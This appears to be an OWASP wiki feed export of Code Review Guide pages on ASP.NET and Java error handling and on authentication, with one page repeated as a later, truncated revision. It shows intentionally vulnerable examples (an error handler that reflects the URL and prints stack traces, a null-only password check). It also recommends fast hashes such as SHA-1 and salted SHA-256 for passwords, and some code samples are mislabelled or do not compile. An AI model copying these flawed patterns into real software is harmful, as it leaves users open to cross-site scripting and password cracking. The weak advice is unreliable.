==Vulnerable Patterns for Error Handling==&lt;br /&gt;
&lt;br /&gt;
===Page_Error===&lt;br /&gt;
&lt;br /&gt;
Page_Error is page level handling which is run on the server side.&lt;br /&gt;
Below is an example but the error information is a little too informative and hence bad practice.&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;script language=&amp;quot;C#&amp;quot; runat=&amp;quot;server&amp;quot;&amp;gt;&lt;br /&gt;
 Sub Page_Error(Source As Object, E As EventArgs)&lt;br /&gt;
 Dim message As String = &amp;lt;Font Color=&amp;quot;red&amp;quot;&amp;gt;Request.Url.ToString()&amp;amp; Server.GetLastError().ToString()&amp;lt;/font&amp;gt;&lt;br /&gt;
 Response.Write(message) // display message &lt;br /&gt;
 End Sub&lt;br /&gt;
  &amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The text in the example above has a number of issues: Firstly, it redisplays the HTTP request to the user in the form of Request.Url.ToString() Assuming there has been no data validation prior to this point, we are vulnerable to cross site scripting attacks!! Secondly, the error message and stack trace is displayed to the user using Server.GetLastError().ToString() which divulges internal information regarding the application. &lt;br /&gt;
&lt;br /&gt;
After the Page_Error is called, the Application_Error sub is called.&lt;br /&gt;
&lt;br /&gt;
===Global.asax===&lt;br /&gt;
&lt;br /&gt;
When an error occurs, the Application_Error sub is called. In this method we can log the error and redirect to another page. &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;%@ Import Namespace=&amp;quot;System.Diagnostics&amp;quot; %&amp;gt;&lt;br /&gt;
   &amp;lt;script language=&amp;quot;C#&amp;quot; runat=&amp;quot;server&amp;quot;&amp;gt;&lt;br /&gt;
     void Application_Error(Object sender, EventArgs e) {&lt;br /&gt;
          String Message = &amp;quot;\n\nURL: http://localhost/&amp;quot; + Request.Path&lt;br /&gt;
                           + &amp;quot;\n\nMESSAGE:\n &amp;quot; + Server.GetLastError().Message&lt;br /&gt;
                           + &amp;quot;\n\nSTACK TRACE:\n&amp;quot; + Server.GetLastError().StackTrace;&lt;br /&gt;
          // Insert into Event Log&lt;br /&gt;
          EventLog Log = new EventLog();&lt;br /&gt;
          Log.Source = LogName;&lt;br /&gt;
          Log.WriteEntry(Message, EventLogEntryType.Error);&lt;br /&gt;
        Server.Redirect(Error.htm) // this shall also clear the error&lt;br /&gt;
     }&lt;br /&gt;
 &amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Above is an example of code in Global.asax and the Application_Error method. The error is logged and then the user is redirected. Unvalidated parameters are being logged here in the form of Request.Path. Care must be taken not to log or redisplay unvalidated input from any external source.&lt;br /&gt;
&lt;br /&gt;
===Web.config===&lt;br /&gt;
Web.config has a custom error tags which can be used to handle errors. This is called last and if Page_error or Application_error is called and has functionality, that functionality shall be executed first. As long as the previous two handling mechanisms do not redirect or clear (Response.Redirect or a Server.ClearError), this will be called and you shall be forwarded to the page defined in web.config. &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;customErrors defaultRedirect=&amp;quot;error.html&amp;quot; mode=&amp;quot;On|Off|RemoteOnly&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;error statusCode=&amp;quot;statuscode&amp;quot; redirect=&amp;quot;url&amp;quot;/&amp;gt;&lt;br /&gt;
 &amp;lt;/customErrors&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The “On&amp;quot; directive means that custom errors are enabled. If no defaultRedirect is specified, users see a generic error. The &amp;quot;Off&amp;quot; directive means that custom errors are disabled. This allows the displaying of detailed errors. &amp;quot;RemoteOnly&amp;quot; specifies that custom errors are shown only to remote clients, and ASP.NET errors are shown to the local host. This is the default. &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;customErrors mode=&amp;quot;On&amp;quot; defaultRedirect=&amp;quot;error.html&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;error statusCode=&amp;quot;500&amp;quot; redirect=&amp;quot;err500.aspx&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;error statusCode=&amp;quot;404&amp;quot; redirect=&amp;quot;notHere.aspx&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;error statusCode=&amp;quot;403&amp;quot; redirect=&amp;quot;notAuthz.aspx&amp;quot;/&amp;gt;&lt;br /&gt;
 &amp;lt;/customErrors&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Leading Practice for Error Handling ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Try &amp;amp; Catch (Java/ .NET)===&lt;br /&gt;
Code that might throw exceptions should be in a try block and code that handles exceptions in a catch block. The catch block is a series of statements beginning with the keyword catch, followed by an exception type and an action to be taken. These are very similar in Java and .NET &lt;br /&gt;
&lt;br /&gt;
'''Example:'''&lt;br /&gt;
&lt;br /&gt;
'''Java Try-Catch:'''&lt;br /&gt;
&lt;br /&gt;
 public class DoStuff {&lt;br /&gt;
     public static void Main() {&lt;br /&gt;
         try {&lt;br /&gt;
             StreamReader sr = File.OpenText(&amp;quot;stuff.txt&amp;quot;);&lt;br /&gt;
             Console.WriteLine(&amp;quot;Reading line {0}&amp;quot;, sr.ReadLine());    &lt;br /&gt;
         }&lt;br /&gt;
         catch(Exception e) {&lt;br /&gt;
             Console.WriteLine(&amp;quot;An error occurred. Please leave to room”);&lt;br /&gt;
 	 logerror(“Error: “, e);&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''.NET Try–Catch'''&lt;br /&gt;
&lt;br /&gt;
 public void run() {&lt;br /&gt;
             while (!stop) {&lt;br /&gt;
                 try {&lt;br /&gt;
 &lt;br /&gt;
                     // Perform work here&lt;br /&gt;
 &lt;br /&gt;
                 } catch (Throwable t) {&lt;br /&gt;
                     // Log the exception and continue&lt;br /&gt;
 		WriteToUser(“An Error has occurred, put the kettle on”);&lt;br /&gt;
                     logger.log(Level.SEVERE, &amp;quot;Unexception exception&amp;quot;, t);&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
&lt;br /&gt;
In general, it is best practice to catch a specific type of exception rather than use the basic catch(Exception) or catch(Throwable) statement in the case of Java. &lt;br /&gt;
&lt;br /&gt;
In classic ASP there are two ways to do error handling, the first is using the err object with an On Error Resume Next.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 Public Function IsInteger (ByVal Number)	 &lt;br /&gt;
   Dim Res, tNumber&lt;br /&gt;
   Number = Trim(Number)&lt;br /&gt;
   tNumber=Number		&lt;br /&gt;
   On Error Resume Next	                     'If an error occurs continue execution&lt;br /&gt;
   Number = CInt(Number) 	             'if Number is a alphanumeric string a Type Mismatch error will occur&lt;br /&gt;
   Res = (err.number = 0) 	             'If there are no errors then return true&lt;br /&gt;
   On Error GoTo 0			     'If an error occurs stop execution and display error&lt;br /&gt;
   re.Pattern = &amp;quot;^[\+\-]? *\d+$&amp;quot;	     'only one +/- and digits are allowed&lt;br /&gt;
   IsInteger = re.Test(tNumber) And Res&lt;br /&gt;
 End Function&lt;br /&gt;
 &lt;br /&gt;
The second is using an error handler on an error page (http://support.microsoft.com/kb/299981).&lt;br /&gt;
 &lt;br /&gt;
 Dim ErrObj&lt;br /&gt;
 set ErrObj = Server.GetLastError()&lt;br /&gt;
 'Now use ErrObj as the regular err object&lt;br /&gt;
&lt;br /&gt;
===Releasing resources and good housekeeping===&lt;br /&gt;
If the language in question has a finally method, use it. The finally method is guaranteed to always be called. The finally method can be used to release resources referenced by the method that threw the exception. This is very important. An example would be if a method gained a database connection from a pool of connections, and an exception occurred without finally, the connection object shall not be returned to the pool for some time (until the timeout). This can lead to pool exhaustion. finally() is called even if no exception is thrown. &lt;br /&gt;
&lt;br /&gt;
 try {&lt;br /&gt;
        System.out.println(&amp;quot;Entering try statement&amp;quot;);&lt;br /&gt;
        out = new PrintWriter(new FileWriter(&amp;quot;OutFile.txt&amp;quot;));&lt;br /&gt;
      //Do Stuff….&lt;br /&gt;
 &lt;br /&gt;
    } catch (Exception e) {&lt;br /&gt;
        System.err.println(&amp;quot;Error occurred!”);&lt;br /&gt;
 &lt;br /&gt;
    } catch (IOException e) {&lt;br /&gt;
        System.err.println(&amp;quot;Input exception &amp;quot;);&lt;br /&gt;
 &lt;br /&gt;
    } finally {&lt;br /&gt;
 &lt;br /&gt;
        if (out != null) { &lt;br /&gt;
            out.close(); // RELEASE RESOURCES&lt;br /&gt;
        } &lt;br /&gt;
    }&lt;br /&gt;
 &lt;br /&gt;
A Java example showing finally() being used to release system resources.&lt;br /&gt;
&lt;br /&gt;
===Classic ASP===&lt;br /&gt;
For Classic ASP pages it is recommended to enclose all cleaning in a function and call it into an error handling statement after an &amp;quot;On Error Resume Next&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
===Centralised exception handling (Struts Example)===&lt;br /&gt;
Building an infrastructure for consistent error reporting proves more difficult than error handling. Struts provides the ActionMessages and ActionErrors classes for maintaining a stack of error messages to be reported, which can be used with JSP tags like &amp;lt;html: error&amp;gt; to display these error messages to the user. &lt;br /&gt;
&lt;br /&gt;
To report a different severity of a message in a different manner (like error, warning, or information) the following tasks are required: &lt;br /&gt;
&lt;br /&gt;
# Register, instantiate the errors under the appropriate severity&lt;br /&gt;
# Identify these messages and show them in a consistent manner.&lt;br /&gt;
&lt;br /&gt;
Struts ActionErrors class makes error handling quite easy:&lt;br /&gt;
&lt;br /&gt;
 ActionErrors errors = new ActionErrors()&lt;br /&gt;
 errors.add(&amp;quot;fatal&amp;quot;, new ActionError(&amp;quot;....&amp;quot;)); &lt;br /&gt;
 errors.add(&amp;quot;error&amp;quot;, new ActionError(&amp;quot;....&amp;quot;)); &lt;br /&gt;
 errors.add(&amp;quot;warning&amp;quot;, new ActionError(&amp;quot;....&amp;quot;));&lt;br /&gt;
 errors.add(&amp;quot;information&amp;quot;, new ActionError(&amp;quot;....&amp;quot;)); &lt;br /&gt;
 saveErrors(request,errors); // Important to do this&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Now that we have added the errors, we display them by using tags in the HTML page. &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;logic:messagePresent property=&amp;quot;error&amp;quot;&amp;gt; &lt;br /&gt;
 &amp;lt;html:messages property=&amp;quot;error&amp;quot; id=&amp;quot;errMsg&amp;quot; &amp;gt;&lt;br /&gt;
     &amp;lt;bean:write name=&amp;quot;errMsg&amp;quot;/&amp;gt;&lt;br /&gt;
 &amp;lt;/html:messages&amp;gt;&lt;br /&gt;
 &amp;lt;/logic:messagePresent &amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Classic ASP===&lt;br /&gt;
For classic ASP pages you need to do some IIS configuration, follow the same link for more information http://support.microsoft.com/kb/299981&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Codereview-Authentication&amp;diff=60154</id>
		<title>Codereview-Authentication</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Codereview-Authentication&amp;diff=60154"/>
				<updated>2009-05-05T11:55:13Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Vulnerabilities related to authentication */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[OWASP Code Review Guide Table of Contents]]__TOC__&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Introduction==&lt;br /&gt;
“Who are you?” Authentication is the process where an entity proves the identity of another entity, typically through credentials, such as a username and password. &lt;br /&gt;
&lt;br /&gt;
Depending on your requirements, there are several available authentication mechanisms to choose from. If they are not correctly chosen and implemented, the authentication mechanism can expose vulnerabilities that attackers can exploit to gain access to your system. &lt;br /&gt;
&lt;br /&gt;
The storage of passwords and user credentials is an issue from a defense in depth approach, but also from a compliance standpoint. The following section also discusses password storage and what to review for.&lt;br /&gt;
&lt;br /&gt;
The following discusses aspects of source code relating to weak authentication functionality. This could be due to flawed implementation or broken business logic: Authentication is a key line of defence in protecting non-public data, sensitive functionality. &lt;br /&gt;
&lt;br /&gt;
===Weak Passwords and Password Functionality===&lt;br /&gt;
Password strength should be enforced upon a user setting/selecting a password. Passwords should be complex in composition. Such checks should be done on the backend/server side of the application upon an attempt to submit a new password. &lt;br /&gt;
&lt;br /&gt;
====Bad Example====&lt;br /&gt;
Simply checking that a password is not NULL is not sufficient:&lt;br /&gt;
&lt;br /&gt;
 String password = request.getParameter(&amp;quot;Password&amp;quot;);&lt;br /&gt;
 if (password == Null) &lt;br /&gt;
    {throw InvalidPasswordException()&lt;br /&gt;
    }&lt;br /&gt;
 &lt;br /&gt;
====Good Example====&lt;br /&gt;
Passwords should be checked for the following composition or a variance of such&lt;br /&gt;
&lt;br /&gt;
* at least: 1 uppercase character (A-Z)&lt;br /&gt;
* at least: 1 lowercase character (a-z)&lt;br /&gt;
* at least: 1 digit (0-9)&lt;br /&gt;
* at least one special character (!&amp;quot;£$%&amp;amp;...)&lt;br /&gt;
* a defined minimum length (8 chars)&lt;br /&gt;
* a defined maximum length (as with all external input)&lt;br /&gt;
* no contiguous characters (123abcd)&lt;br /&gt;
* not more than 2 identical characters in a row (1111)&lt;br /&gt;
&lt;br /&gt;
Such rules should be looked for in code and used as soon as the http request is received. The rules can be complex RegEx expressions or logical code statements: &lt;br /&gt;
&lt;br /&gt;
 if password.RegEx([a-z])&lt;br /&gt;
    and password.RegEx([A-Z])&lt;br /&gt;
    and password.RegEx([0-9])&lt;br /&gt;
    and password.RegEx({8-30})&lt;br /&gt;
    and password.RexEX([!&amp;quot;£$%^&amp;amp;*()])&lt;br /&gt;
    return true;&lt;br /&gt;
 else&lt;br /&gt;
 return false;&lt;br /&gt;
&lt;br /&gt;
A regular expression statement for code above:&lt;br /&gt;
&lt;br /&gt;
 (?=^.{8,30}$)(?=.*\d)(?=.*[a-z])(?=.*[A-Z])(?=.*[!@#$%^&amp;amp;*()_+}{&amp;quot;&amp;quot;:;'?/&amp;gt;.&amp;lt;,]).*$&lt;br /&gt;
&lt;br /&gt;
=== '''.NET Authentication controls''' ===&lt;br /&gt;
In the .NET, there is Authentication tags in the configuration file. &lt;br /&gt;
&lt;br /&gt;
The &amp;lt;'''authentication'''&amp;gt; element configures the authentication mode that your applications use.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;'''authentication'''&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The appropriate authentication mode depends on how your application or Web&lt;br /&gt;
service has been designed. The default Machine.config setting applies a secure&lt;br /&gt;
Windows authentication default as shown below.&lt;br /&gt;
&lt;br /&gt;
''' authentication Attributes:mode=&amp;quot;[Windows|Forms|Passport|None]&amp;quot; '''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;authentication mode=&amp;quot;Windows&amp;quot; /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' Forms Authentication Guidelines '''&lt;br /&gt;
To use Forms authentication, set mode=“Forms” on the &amp;lt;authentication&amp;gt; element.&lt;br /&gt;
Next, configure Forms authentication using the child &amp;lt;forms&amp;gt; element. The&lt;br /&gt;
following fragment shows a secure &amp;lt;forms&amp;gt; authentication element configuration:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;authentication mode=&amp;quot;Forms&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;forms loginUrl=&amp;quot;Restricted\login.aspx&amp;quot;     Login page in an SSL protected folder&lt;br /&gt;
       protection=&amp;quot;All&amp;quot;                      Privacy and integrity&lt;br /&gt;
       requireSSL=&amp;quot;true&amp;quot;                     Prevents cookie being sent over http&lt;br /&gt;
       timeout=&amp;quot;10&amp;quot;                          Limited session lifetime&lt;br /&gt;
       name=&amp;quot;AppNameCookie&amp;quot;                  Unique per-application name&lt;br /&gt;
       path=&amp;quot;/FormsAuth&amp;quot;                     and path&lt;br /&gt;
       slidingExpiration=&amp;quot;true&amp;quot; &amp;gt;            Sliding session lifetime&lt;br /&gt;
 &amp;lt;/forms&amp;gt;&lt;br /&gt;
 &amp;lt;/authentication&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Use the following recommendations to improve Forms authentication security:&lt;br /&gt;
* Partition your Web site.&lt;br /&gt;
* Set protection=“All”.&lt;br /&gt;
* Use small cookie time-out values.&lt;br /&gt;
* Consider using a fixed expiration period.&lt;br /&gt;
* Use SSL with Forms authentication.&lt;br /&gt;
* If you do not use SSL, set slidingExpiration = “false”.&lt;br /&gt;
* Do not use the &amp;lt;credentials&amp;gt; element on production servers.&lt;br /&gt;
* Configure the &amp;lt;machineKey&amp;gt; element.&lt;br /&gt;
* Use unique cookie names and paths.&lt;br /&gt;
&lt;br /&gt;
For classic ASP pages, authentication is usually performed manually by including the user information in session variables after validation against a DB, so you can look for something like: &lt;br /&gt;
 Session (&amp;quot;UserId&amp;quot;) = UserName&lt;br /&gt;
 Session (&amp;quot;Roles&amp;quot;) = UserRoles&lt;br /&gt;
&lt;br /&gt;
====Cookieless Forms authentication====&lt;br /&gt;
Authentication tickets in forms are by default stored in cookies (Authentication tickets are used to remember if the user has authenticated to the system), such as a unique ID in the cookie of the HTTP header. Other methods to preserve authentication in the stateless HTTP protocol. The directive cookieless can define thet type of authentication ticket to be used. &lt;br /&gt;
&lt;br /&gt;
Types of cookieless values on the &amp;lt;forms&amp;gt; element:&lt;br /&gt;
&lt;br /&gt;
* UseCookies – specifies that cookie tickets will always be used. &lt;br /&gt;
* UseUri – indicates that cookie tickets will never be used. &lt;br /&gt;
* AutoDetect – cookie tickets are not used if device does not support such; if the device profile supports cookies, a probing function is used to determine if cookies are enabled. &lt;br /&gt;
* UseDeviceProfile – the default setting if not defined; uses cookie-based authentication tickets only if the device profile supports cookies. A probing function is not used.&lt;br /&gt;
&lt;br /&gt;
cookieless=&amp;quot;UseUri&amp;quot; : What may be found in the &amp;lt;forms&amp;gt; element above&lt;br /&gt;
&lt;br /&gt;
When we talk about probing we are refering to the user agent directive in the HTTP header. This can inform ASP.NET is cookies are supported.&lt;br /&gt;
&lt;br /&gt;
==Password Storage Strategy==&lt;br /&gt;
The storage of passwords is also of concern, as unauthorized access to an application may give rise to an attacker to access the area where passwords are stored.&lt;br /&gt;
&lt;br /&gt;
Passwords should be stored using a one-way hash algorithm. One way functions (SHA-256 SHA-1 MD5, ..;) are also known as Hashing functions. Once passwords are persisted, there is no reason why they should be human-readable. The functionality for authentication performs a hash of the password passed by the user and compares it to the stored hash. If the passwords are identical, the hashes are equal.&lt;br /&gt;
&lt;br /&gt;
Storing a hash of a password, which cannot be reversed, makes it more difficult to recover the plain text passwords. It also ensures that administration staff for an application does not have access to other users’ passwords, and hence helps mitigate the internal threat vector.&lt;br /&gt;
&lt;br /&gt;
Example code in Java implementing SHA-1 hashing:&lt;br /&gt;
&lt;br /&gt;
 import java.security.MessageDigest;&lt;br /&gt;
 public byte[] getHash(String password) throws NoSuchAlgorithmException {&lt;br /&gt;
       MessageDigest digest = MessageDigest.getInstance(&amp;quot;SHA-1&amp;quot;);&lt;br /&gt;
       digest.reset();&lt;br /&gt;
       byte[] input = digest.digest(password.getBytes(&amp;quot;UTF-8&amp;quot;));&lt;br /&gt;
&lt;br /&gt;
'''Salting:'''&lt;br /&gt;
Storing simply hashed passwords has its issues, such as the possibility to identify two identical passwords (identical hashes) and also the [http://en.wikipedia.org/wiki/Birthday_paradox birthday attack]. A countermeasure for such issues is to introduce a salt. A salt is a random number of a fixed length. This salt must be different for each stored entry. It must be stored as clear text next to the hashed password:&lt;br /&gt;
&lt;br /&gt;
 import java.security.MessageDigest;&lt;br /&gt;
 public byte[] getHash(String password, byte[] salt) throws NoSuchAlgorithmException {&lt;br /&gt;
       MessageDigest digest = MessageDigest.getInstance(&amp;quot;SHA-256&amp;quot;);&lt;br /&gt;
       digest.reset();&lt;br /&gt;
       digest.update(salt);&lt;br /&gt;
       return digest.digest(password.getBytes(&amp;quot;UTF-8&amp;quot;));&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
===Vulnerabilities related to authentication ===&lt;br /&gt;
&lt;br /&gt;
There are many issues relating to authentication which utilise form fields. Inadequate field validation can give rise to the following issues:&lt;br /&gt;
&lt;br /&gt;
*[[Reviewing Code for SQL Injection]]&lt;br /&gt;
SQL injection can be used to bypass authentication functionality and even add a malicious user to a system for future use.&lt;br /&gt;
*[[Reviewing Code for Data Validation]]&lt;br /&gt;
Data validation of all external input must be performed. This also goes for authentication fields.&lt;br /&gt;
*[[Reviewing Code for Cross-site scripting]]&lt;br /&gt;
Cross site scripting can be used on the authentication page to perform identity theft, Phishing, and session hijacking attacks.&lt;br /&gt;
*[[Reviewing Code for Error Handling]]&lt;br /&gt;
Bad/weak error handling can be used to establish the internal workings of the authentication functionality such as giving insight into the database structure, insight into valid and invalid user IDs, etc.&lt;br /&gt;
*[[Hashing Java|Hashing with Java]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Codereview-Authentication&amp;diff=60153</id>
		<title>Codereview-Authentication</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Codereview-Authentication&amp;diff=60153"/>
				<updated>2009-05-05T11:54:05Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Password Storage Strategy */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[OWASP Code Review Guide Table of Contents]]__TOC__&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Introduction==&lt;br /&gt;
“Who are you?” Authentication is the process where an entity proves the identity of another entity, typically through credentials, such as a username and password. &lt;br /&gt;
&lt;br /&gt;
Depending on your requirements, there are several available authentication mechanisms to choose from. If they are not correctly chosen and implemented, the authentication mechanism can expose vulnerabilities that attackers can exploit to gain access to your system. &lt;br /&gt;
&lt;br /&gt;
The storage of passwords and user credentials is an issue from a defense in depth approach, but also from a compliance standpoint. The following section also discusses password storage and what to review for.&lt;br /&gt;
&lt;br /&gt;
The following discusses aspects of source code relating to weak authentication functionality. This could be due to flawed implementation or broken business logic: Authentication is a key line of defence in protecting non-public data, sensitive functionality. &lt;br /&gt;
&lt;br /&gt;
===Weak Passwords and Password Functionality===&lt;br /&gt;
Password strength should be enforced upon a user setting/selecting a password. Passwords should be complex in composition. Such checks should be done on the backend/server side of the application upon an attempt to submit a new password. &lt;br /&gt;
&lt;br /&gt;
====Bad Example====&lt;br /&gt;
Simply checking that a password is not NULL is not sufficient:&lt;br /&gt;
&lt;br /&gt;
 String password = request.getParameter(&amp;quot;Password&amp;quot;);&lt;br /&gt;
 if (password == Null) &lt;br /&gt;
    {throw InvalidPasswordException()&lt;br /&gt;
    }&lt;br /&gt;
 &lt;br /&gt;
====Good Example====&lt;br /&gt;
Passwords should be checked for the following composition or a variance of such&lt;br /&gt;
&lt;br /&gt;
* at least: 1 uppercase character (A-Z)&lt;br /&gt;
* at least: 1 lowercase character (a-z)&lt;br /&gt;
* at least: 1 digit (0-9)&lt;br /&gt;
* at least one special character (!&amp;quot;£$%&amp;amp;...)&lt;br /&gt;
* a defined minimum length (8 chars)&lt;br /&gt;
* a defined maximum length (as with all external input)&lt;br /&gt;
* no contiguous characters (123abcd)&lt;br /&gt;
* not more than 2 identical characters in a row (1111)&lt;br /&gt;
&lt;br /&gt;
Such rules should be looked for in code and used as soon as the http request is received. The rules can be complex RegEx expressions or logical code statements: &lt;br /&gt;
&lt;br /&gt;
 if password.RegEx([a-z])&lt;br /&gt;
    and password.RegEx([A-Z])&lt;br /&gt;
    and password.RegEx([0-9])&lt;br /&gt;
    and password.RegEx({8-30})&lt;br /&gt;
    and password.RexEX([!&amp;quot;£$%^&amp;amp;*()])&lt;br /&gt;
    return true;&lt;br /&gt;
 else&lt;br /&gt;
 return false;&lt;br /&gt;
&lt;br /&gt;
A regular expression statement for code above:&lt;br /&gt;
&lt;br /&gt;
 (?=^.{8,30}$)(?=.*\d)(?=.*[a-z])(?=.*[A-Z])(?=.*[!@#$%^&amp;amp;*()_+}{&amp;quot;&amp;quot;:;'?/&amp;gt;.&amp;lt;,]).*$&lt;br /&gt;
&lt;br /&gt;
=== '''.NET Authentication controls''' ===&lt;br /&gt;
In the .NET, there is Authentication tags in the configuration file. &lt;br /&gt;
&lt;br /&gt;
The &amp;lt;'''authentication'''&amp;gt; element configures the authentication mode that your applications use.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;'''authentication'''&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The appropriate authentication mode depends on how your application or Web&lt;br /&gt;
service has been designed. The default Machine.config setting applies a secure&lt;br /&gt;
Windows authentication default as shown below.&lt;br /&gt;
&lt;br /&gt;
''' authentication Attributes:mode=&amp;quot;[Windows|Forms|Passport|None]&amp;quot; '''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;authentication mode=&amp;quot;Windows&amp;quot; /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' Forms Authentication Guidelines '''&lt;br /&gt;
To use Forms authentication, set mode=“Forms” on the &amp;lt;authentication&amp;gt; element.&lt;br /&gt;
Next, configure Forms authentication using the child &amp;lt;forms&amp;gt; element. The&lt;br /&gt;
following fragment shows a secure &amp;lt;forms&amp;gt; authentication element configuration:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;authentication mode=&amp;quot;Forms&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;forms loginUrl=&amp;quot;Restricted\login.aspx&amp;quot;     Login page in an SSL protected folder&lt;br /&gt;
       protection=&amp;quot;All&amp;quot;                      Privacy and integrity&lt;br /&gt;
       requireSSL=&amp;quot;true&amp;quot;                     Prevents cookie being sent over http&lt;br /&gt;
       timeout=&amp;quot;10&amp;quot;                          Limited session lifetime&lt;br /&gt;
       name=&amp;quot;AppNameCookie&amp;quot;                  Unique per-application name&lt;br /&gt;
       path=&amp;quot;/FormsAuth&amp;quot;                     and path&lt;br /&gt;
       slidingExpiration=&amp;quot;true&amp;quot; &amp;gt;            Sliding session lifetime&lt;br /&gt;
 &amp;lt;/forms&amp;gt;&lt;br /&gt;
 &amp;lt;/authentication&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Use the following recommendations to improve Forms authentication security:&lt;br /&gt;
* Partition your Web site.&lt;br /&gt;
* Set protection=“All”.&lt;br /&gt;
* Use small cookie time-out values.&lt;br /&gt;
* Consider using a fixed expiration period.&lt;br /&gt;
* Use SSL with Forms authentication.&lt;br /&gt;
* If you do not use SSL, set slidingExpiration = “false”.&lt;br /&gt;
* Do not use the &amp;lt;credentials&amp;gt; element on production servers.&lt;br /&gt;
* Configure the &amp;lt;machineKey&amp;gt; element.&lt;br /&gt;
* Use unique cookie names and paths.&lt;br /&gt;
&lt;br /&gt;
For classic ASP pages, authentication is usually performed manually by including the user information in session variables after validation against a DB, so you can look for something like: &lt;br /&gt;
 Session (&amp;quot;UserId&amp;quot;) = UserName&lt;br /&gt;
 Session (&amp;quot;Roles&amp;quot;) = UserRoles&lt;br /&gt;
&lt;br /&gt;
====Cookieless Forms authentication====&lt;br /&gt;
Authentication tickets in forms are by default stored in cookies (Authentication tickets are used to remember if the user has authenticated to the system), such as a unique ID in the cookie of the HTTP header. Other methods to preserve authentication in the stateless HTTP protocol. The directive cookieless can define thet type of authentication ticket to be used. &lt;br /&gt;
&lt;br /&gt;
Types of cookieless values on the &amp;lt;forms&amp;gt; element:&lt;br /&gt;
&lt;br /&gt;
* UseCookies – specifies that cookie tickets will always be used. &lt;br /&gt;
* UseUri – indicates that cookie tickets will never be used. &lt;br /&gt;
* AutoDetect – cookie tickets are not used if device does not support such; if the device profile supports cookies, a probing function is used to determine if cookies are enabled. &lt;br /&gt;
* UseDeviceProfile – the default setting if not defined; uses cookie-based authentication tickets only if the device profile supports cookies. A probing function is not used.&lt;br /&gt;
&lt;br /&gt;
cookieless=&amp;quot;UseUri&amp;quot; : What may be found in the &amp;lt;forms&amp;gt; element above&lt;br /&gt;
&lt;br /&gt;
When we talk about probing we are refering to the user agent directive in the HTTP header. This can inform ASP.NET is cookies are supported.&lt;br /&gt;
&lt;br /&gt;
==Password Storage Strategy==&lt;br /&gt;
The storage of passwords is also of concern, as unauthorized access to an application may give rise to an attacker to access the area where passwords are stored.&lt;br /&gt;
&lt;br /&gt;
Passwords should be stored using a one-way hash algorithm. One way functions (SHA-256 SHA-1 MD5, ..;) are also known as Hashing functions. Once passwords are persisted, there is no reason why they should be human-readable. The functionality for authentication performs a hash of the password passed by the user and compares it to the stored hash. If the passwords are identical, the hashes are equal.&lt;br /&gt;
&lt;br /&gt;
Storing a hash of a password, which cannot be reversed, makes it more difficult to recover the plain text passwords. It also ensures that administration staff for an application does not have access to other users’ passwords, and hence helps mitigate the internal threat vector.&lt;br /&gt;
&lt;br /&gt;
Example code in Java implementing SHA-1 hashing:&lt;br /&gt;
&lt;br /&gt;
 import java.security.MessageDigest;&lt;br /&gt;
 public byte[] getHash(String password) throws NoSuchAlgorithmException {&lt;br /&gt;
       MessageDigest digest = MessageDigest.getInstance(&amp;quot;SHA-1&amp;quot;);&lt;br /&gt;
       digest.reset();&lt;br /&gt;
       byte[] input = digest.digest(password.getBytes(&amp;quot;UTF-8&amp;quot;));&lt;br /&gt;
&lt;br /&gt;
'''Salting:'''&lt;br /&gt;
